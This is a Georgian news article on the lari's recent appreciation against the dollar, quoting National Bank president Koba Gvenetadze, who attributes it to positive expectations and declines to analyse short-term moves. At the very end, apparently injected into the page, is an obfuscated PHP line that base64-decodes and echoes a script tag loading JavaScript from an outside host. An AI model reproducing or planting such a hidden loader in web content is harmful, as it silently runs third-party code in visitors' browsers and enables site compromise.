celsiusi
ავერსი შნაიდერი
ბოლო დღეებში ლარის კურსის გამყარების ტენდენციაზე საქართველოს ეროვნული ბანკის პრეზიდენტმა პარლამენტის საფინანსო-საბიუჯეტო კომიტეტის სხდომის შემდეგ გააკეთა კომენტარი. 
 
კობა გვენეტაძემ რამდენიმე ფაქტორი დაასახელა, რომელმაც მისი აზრით, კურსის გამყარებას შეუწყო ხელი, მაგრამ იქვე აღნიშნა, რომ მოკლევადიანი გამყარების კომენტირება ან ანალიზი არაა მიზანშეწონილი.
 
„რაც შეეხება მოკლევადიან პერიოდში ლარის კურსის მოძრაობას გამყარების მიმართულებით - შეუძლებელია, კონკრეტულად დავასახელოთ რამე მიზეზი, ეს მომავალში უნდა დაგვანახოს საგადამხდელო ბალანსმა, რომელიც გარკვეული პერიოდის შემდეგ გამოქვეყნდება და აუცილებელია ეს იმისთვის, რომ ზუსტად, რიცხობრივად შევხედოთ, რამ გამოიწვია აღნიშნული.
 
აქედან გამომდინარე, როგორც წესი, არ ვაკეთებთ ხოლმე ლარის მოკლევადიან მოძრაობაზე კომენტარს და არც ანალიზი უნდა გაკეთდეს; ყოველთვის გრძელვადიანი პერიოდის აღებაა საჭირო, მაგრამ თუ მაინც შევხედავთ მოკლევადიან ვითარებას, არის დადებითი მოლოდინები - ეკონომიკამ დაიწყო ზრდა, ინფიცირების რიცხვი შემცირდა, ფინანსური სისტემა კარგად უმკლავდება გამოწვევებს. ამდენად, ვფიქრობ, ეს ყველაფერი ეხმარება დადებითი მოლოდინების შექმნას, რაც მოქმედებს ლარის კურსზე“, - განაცხადა კობა გვენეტაძემ.
 
აღსანიშნავია, რომ 2 ივნისის ვაჭრობის შედეგად ლარი გამყარდა. აშშ დოლართან მიმართებით კურსის ცვლილებამ 3.19 თეთრი შეადგინა, რის შედეგადაც დოლარის ოფიციალური ღირებულება 3.2228 ლარი გახდა.
 
1360
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");